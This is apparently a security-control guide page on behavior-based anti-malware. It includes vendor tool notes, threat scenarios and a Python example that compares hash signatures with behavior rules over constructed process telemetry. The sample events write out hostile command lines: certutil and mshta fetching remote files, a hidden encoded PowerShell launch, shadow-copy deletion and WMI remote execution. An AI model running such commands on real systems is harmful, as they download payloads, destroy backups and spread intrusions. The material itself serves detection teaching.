Use Behavior-Based Anti-Malware Software
Description
Use behavior-based anti-malware software: tooling that identifies malicious activity from what a process does (process lineage, command-line arguments, API calls, file, registry and network activity) rather than from static file signatures alone.
Implementation Checklist
Tool Recommendations
- CrowdStrike (Falcon): cloud-native endpoint protection platform with next-gen AV, EDR, threat intelligence, and managed hunting. Per-endpoint subscription.
- Microsoft (Defender for Endpoint, P1/P2): enterprise endpoint security with threat prevention, EDR, automated investigation, and attack surface reduction. Per-device subscription; EDR and automated investigation are Plan 2 features, so a Plan 1 license on its own does not provide the behavioral detection this safeguard calls for.
- SentinelOne (Singularity): AI-powered endpoint protection with autonomous response, EDR, and XDR capabilities across endpoint, cloud, and identity. Per-endpoint subscription.
- Palo Alto Networks (Cortex XDR): extended detection and response platform correlating endpoint, network, cloud, and identity data for threat detection. Per-endpoint subscription.
Threats & Vulnerabilities (CIS RAM)
Threat Scenarios
Zero-Day Malware Evading Signature-Based Detection
Confidentiality: Novel malware with no existing signature passes a signature-only anti-malware engine untouched, and without behavior-based detection its actions (file encryption, credential access, lateral movement) execute unchallenged.
Polymorphic Malware Defeating Static Analysis
Integrity: Malware that re-packs or re-encodes its code with each new copy presents a different hash and byte pattern to every signature engine, so static file characteristics never match. Only behavioral analysis of what the process does (process injection, persistence mechanisms, C2 communication) identifies it.
Living-Off-the-Land Techniques Invisible to Signature Scanning
Confidentiality: Attackers use legitimate, signed operating system tools (PowerShell, WMI, certutil, mshta) to carry out malicious actions. The binaries themselves are trusted, so signature-based scanning has nothing to match; only behavioral analysis of the command line, parent process, and resulting activity identifies the abuse.
Vulnerabilities (When Safeguard Absent)
Anti-Malware Relies Solely on Signature-Based Detection
The organization's anti-malware solution uses only static signature matching without behavioral analysis, heuristics, or machine learning capabilities, making it blind to zero-day threats, polymorphic malware, and fileless attack techniques.
No EDR or Next-Generation Endpoint Protection
The organization has not deployed endpoint detection and response (EDR) or next-generation antivirus (NGAV) solutions that monitor process behavior, API calls, and system interactions to detect malicious activity patterns regardless of file signatures.
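The following is an added example, not code from the page or from any of the products named above. It makes the difference between the two scenarios concrete: a hash blocklist (what a signature-only engine has) is run beside a small set of behavior rules over constructed process-creation telemetry covering the threat scenarios above (a repacked dropper, Office spawning an encoded PowerShell command, certutil and mshta fetching remote content, WMI remote process creation, shadow-copy deletion). The hashes, command lines, rule names and host names are all constructed for illustration and are not any vendor's detection logic.

```python
"""Signature matching vs behavior rules over constructed endpoint process telemetry.

Everything here is illustrative: the hashes, command lines and rule names are
constructed for this example and are not a vendor's detection logic.
"""
import hashlib
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    parent_image: str  # image name of the parent process
    image: str         # image name of the launched process
    cmdline: str
    file_sha256: str   # hash of the launched image on disk


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def legit(name: str) -> str:
    # Constructed stand-in for the on-disk hash of a legitimate OS binary.
    return sha256_hex(b"constructed stand-in for legitimate " + name.encode())


# Two copies of the same dropper: variant B is repacked, so its hash differs.
VARIANT_A = sha256_hex(b"constructed dropper bytes, variant A")
VARIANT_B = sha256_hex(b"constructed dropper bytes, variant B (repacked)")
SIGNATURE_BLOCKLIST = {VARIANT_A}  # a signature engine only knows what it has already seen

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def base(name: str) -> str:
    return name.rsplit("\\", 1)[-1].lower()


def has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.I) is not None


def signature_match(ev: ProcessEvent) -> bool:
    """Static check on what the file *is*; anything repacked or built into the OS slips past."""
    return ev.file_sha256 in SIGNATURE_BLOCKLIST


# Behavior rules look at what the process *does*: lineage, tool and arguments.
RULES = [
    ("office_spawns_shell", lambda ev: base(ev.parent_image) in OFFICE_APPS and base(ev.image) in SHELLS),
    ("powershell_encoded_hidden", lambda ev: base(ev.image) in {"powershell.exe", "pwsh.exe"}
        and has(r"\s-(e|ec|enc|encodedcommand)\s", ev.cmdline)
        and has(r"-(w|windowstyle)\s+hidden|-nop\b", ev.cmdline)),
    ("certutil_download", lambda ev: base(ev.image) == "certutil.exe"
        and has(r"-urlcache", ev.cmdline) and has(r"https?://", ev.cmdline)),
    ("mshta_remote_script", lambda ev: base(ev.image) == "mshta.exe"
        and has(r"https?://|javascript:|vbscript:", ev.cmdline)),
    ("wmic_process_create", lambda ev: base(ev.image) == "wmic.exe"
        and has(r"process\s+call\s+create", ev.cmdline)),
    ("shadow_copy_deletion", lambda ev: base(ev.image) == "vssadmin.exe"
        and has(r"delete\s+shadows", ev.cmdline)),
]


def evaluate(events):
    """Return {pid: {"signature": bool, "behavior": [matched rule names]}}."""
    return {ev.pid: {"signature": signature_match(ev),
                     "behavior": [name for name, fn in RULES if fn(ev)]} for ev in events}


def flagged_by(results, engine):
    return sorted(pid for pid, r in results.items() if r[engine])


# Constructed telemetry: one known dropper, its repacked twin, and LOLBin abuse.
EVENTS = [
    ProcessEvent(1, "explorer.exe", "invoice_2024.pdf.exe", "invoice_2024.pdf.exe", VARIANT_A),
    ProcessEvent(2, "winword.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
                 legit("powershell.exe")),
    ProcessEvent(3, "cmd.exe", "certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\Users\Public\a.txt",
                 legit("certutil.exe")),
    ProcessEvent(4, "explorer.exe", "mshta.exe", "mshta.exe http://203.0.113.5/x.hta", legit("mshta.exe")),
    ProcessEvent(5, "explorer.exe", "notepad.exe", r"notepad.exe C:\Users\bob\notes.txt", legit("notepad.exe")),
    ProcessEvent(6, "explorer.exe", "invoice_2024.pdf.exe", "invoice_2024.pdf.exe", VARIANT_B),
    ProcessEvent(7, "invoice_2024.pdf.exe", "vssadmin.exe", "vssadmin.exe delete shadows /all /quiet",
                 legit("vssadmin.exe")),
    ProcessEvent(8, "cmd.exe", "wmic.exe", 'wmic.exe /node:FS01 process call create "cmd.exe /c whoami"',
                 legit("wmic.exe")),
]

if __name__ == "__main__":
    results = evaluate(EVENTS)
    print("signature hits:", flagged_by(results, "signature"))  # [1]
    print("behavior hits: ", flagged_by(results, "behavior"))   # [2, 3, 4, 7, 8]
    for pid in flagged_by(results, "behavior"):
        print(f"  pid {pid}: {results[pid]['behavior']}")
```

Two points worth noticing in the output. The blocklist catches only pid 1, the copy whose hash it already holds; the repacked twin (pid 6) launches with no signature or behavior hit at all, and it is only its child process deleting shadow copies (pid 7) that gives it away, which is why a behavior-based product records process lineage and attributes a child's activity back to the tree rather than judging each launch in isolation. Every LOLBin event (pids 2, 3, 4, 8) runs a signed Microsoft binary with a clean hash, so a signature engine has nothing to match; the rules fire on the combination of parent process and arguments instead. Real rule sets are far larger and tuned against an environment's baseline to control false positives, but the shape is the same.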
Evidence Requirements
| Type | Evidence Item | Collection Frequency |
|---|---|---|
| Technical | Detection tool deployment evidence (dashboard screenshots, agent status) | Monthly |
| Technical | Sample alert/detection output demonstrating behavioral detection capability | Quarterly |
| Technical | Anti-malware deployment status and detection statistics | Monthly |
| Document | Governing policy document (current, approved, communicated) | Annually |